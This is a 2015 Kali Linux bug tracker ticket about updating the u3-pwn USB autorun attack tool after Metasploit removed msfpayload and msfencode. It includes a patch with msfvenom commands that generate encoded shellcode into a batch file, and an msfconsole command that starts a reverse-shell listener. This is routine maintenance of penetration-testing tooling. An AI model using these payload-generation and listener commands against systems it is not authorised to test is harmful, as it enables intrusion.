0002326: u3-pwn v2.0 & Msfpayload/Msfencode - Kali Linux Bug Tracker

ID	Project	Category	View Status	Date Submitted	Last Update

0002326	Kali Linux	Kali Package Bug	public	2015-06-11 15:52	2015-07-31 06:41

Reporter	g0tmi1k	Assigned To	rhertzog
Priority	normal	Severity	minor	Reproducibility	have not tried
Status	resolved	Resolution	fixed
Product Version	2.0
Fixed in Version	2.0

Summary	0002326: u3-pwn v2.0 & Msfpayload/Msfencode
Description	Msfencode & msfpayload are no longer in Metasploit. More information: https://community.rapid7.com/community/metasploit/blog/2015/06/08/msfpayload-and-msfencode-are-being-removed-from-metasploit In the next metasploit package update, u3-pwn will break. root@kali ~$ cd u3-pwn-2.0 root@kali ~/u3-pwn-2.0$ ls backup debian Required resource src u3-pwn.py root@kali ~/u3-pwn-2.0$ grep -R msfpayload src/generator.py: subprocess.Popen('msfpayload %s EXITFUNC=thread LHOST=%s LPORT=%s R \| msfencode -c 2 -e %s -t raw \| msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX > resource/payload.txt' % (shellcode[payload-1], addr, port, encoders[encode-1] ), stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True).wait() root@kali ~/u3-pwn-2.0$ grep -R msfencode src/generator.py: subprocess.Popen('msfpayload %s EXITFUNC=thread LHOST=%s LPORT=%s R \| msfencode -c 2 -e %s -t raw \| msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX > resource/payload.txt' % (shellcode[payload-1], addr, port, encoders[encode-1] ), stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True).wait() root@kali ~/u3-pwn-2.0$
Attached Files	msfvenom.patch (1,539 bytes) --- src/generator.py 2015-06-16 12:54:31.336510552 +0100 +++ src/generator.py 2015-06-16 12:58:46.936549581 +0100 @@ -219,7 +219,7 @@ if port is not socket.inet_aton(port): banner.print_banner() print ' Generating Shellcode Please Wait...' - subprocess.Popen('msfpayload %s EXITFUNC=thread LHOST=%s LPORT=%s R \| msfencode -c 2 -e %s -t raw \| msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX > resource/payload.txt' % (shellcode[payload-1], addr, port, encoders[encode-1] ), stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True).wait() + subprocess.Popen('msfvenom -p %s EXITFUNC=thread LHOST=%s LPORT=%s -f raw -i 2 -e %s -f raw -a x86 -e x86/alpha_mixed -f raw BufferRegister=EAX --platform Windows -o resource/payload.txt' % (shellcode[payload-1], addr, port, encoders[encode-1]), stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True).wait() alpha = open('resource/payload.txt', 'r') text = alpha.readline() file = open('resource/LaunchU3.bat', 'w') @@ -258,7 +258,7 @@ if listener == 'yes' or listener == 'y': banner.print_banner() - subprocess.Popen('msfcli exploit/multi/handler PAYLOAD=%s LHOST=0.0.0.0 LPORT=%s E' % (shellcode[payload-1], port), shell=True).wait() + subprocess.Popen('msfconsole -x \'use exploit/multi/handler;set PAYLOAD %s;set LHOST 0.0.0.0;set LPORT %s;exploit\'' % (shellcode[payload-1], port), shell=True).wait() else: banner.print_banner() msfvenom.patch (1,539 bytes)

g0tmi1k 2015-06-11 15:59 administrator ~0003399	Theres also msfcli - https://github.com/rapid7/metasploit-framework/issues/3802 `root@kali:~/u3-pwn-2.0# grep -R msfcli . ./src/generator.py: subprocess.Popen('msfcli exploit/multi/handler PAYLOAD=%s LHOST=0.0.0.0 LPORT=%s E' % (shellcode[payload-1], port), shell=True).wait() root@kali:~/u3-pwn-2.0#`

g0tmi1k 2015-06-16 12:04 administrator ~0003404	Patch to fix it Warning, mixture of tabs & spaces. --- src/generator.py 2015-06-16 12:54:31.336510552 +0100 +++ src/generator.py 2015-06-16 12:58:46.936549581 +0100 @@ -219,7 +219,7 @@ if port is not socket.inet_aton(port): banner.print_banner() print ' Generating Shellcode Please Wait...' - subprocess.Popen('msfpayload %s EXITFUNC=thread LHOST=%s LPORT=%s R \| msfencode -c 2 -e %s -t raw \| msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX > resource/payload.txt' % (shellcode[payload-1], addr, port, encoders[encode-1] ), stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True).wait() + subprocess.Popen('msfvenom -p %s EXITFUNC=thread LHOST=%s LPORT=%s -f raw -i 2 -e %s -f raw -a x86 -e x86/alpha_mixed -f raw BufferRegister=EAX --platform Windows -o resource/payload.txt' % (shellcode[payload-1], addr, port, encoders[encode-1]), stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True).wait() alpha = open('resource/payload.txt', 'r') text = alpha.readline() file = open('resource/LaunchU3.bat', 'w') @@ -258,7 +258,7 @@ if listener == 'yes' or listener == 'y': banner.print_banner() - subprocess.Popen('msfcli exploit/multi/handler PAYLOAD=%s LHOST=0.0.0.0 LPORT=%s E' % (shellcode[payload-1], port), shell=True).wait() + subprocess.Popen('msfconsole -x \'use exploit/multi/handler;set PAYLOAD %s;set LHOST 0.0.0.0;set LPORT %s;exploit\'' % (shellcode[payload-1], port), shell=True).wait() else: banner.print_banner() Proof `root@kali:~/u3-pwn-2.0# patch < msfvenom.patch can't find file to patch at input line 3 Perhaps you should have used the -p or --strip option? The text leading up to this was: -------------------------- \|--- src/generator.py 2015-06-16 12:54:31.336510552 +0100 \|+++ src/generator.py 2015-06-16 12:58:46.936549581 +0100 -------------------------- File to patch: src/generator.py patching file src/generator.py root@kali:~/u3-pwn-2.0#`

rhertzog 2015-07-28 21:01 administrator ~0003623	Fixed in u3-pwn 2.0-1kali3. Please test.

g0tmi1k 2015-07-31 06:41 administrator ~0003644	Confirmed fixed.

Date Modified	Username	Field	Change
2015-06-11 15:52	g0tmi1k	New Issue
2015-06-11 15:59	g0tmi1k	Note Added: 0003399
2015-06-16 12:04	g0tmi1k	Note Added: 0003404
2015-06-16 12:05	g0tmi1k	File Added: msfvenom.patch
2015-07-27 10:30	g0tmi1k	Product Version	=> 2.0
2015-07-27 14:42	rhertzog	Assigned To	=> rhertzog
2015-07-27 14:42	rhertzog	Status	new => assigned
2015-07-28 21:01	rhertzog	Note Added: 0003623
2015-07-28 21:01	rhertzog	Status	assigned => resolved
2015-07-28 21:01	rhertzog	Fixed in Version	=> 2.0
2015-07-28 21:01	rhertzog	Resolution	open => fixed
2015-07-31 06:41	g0tmi1k	Note Added: 0003644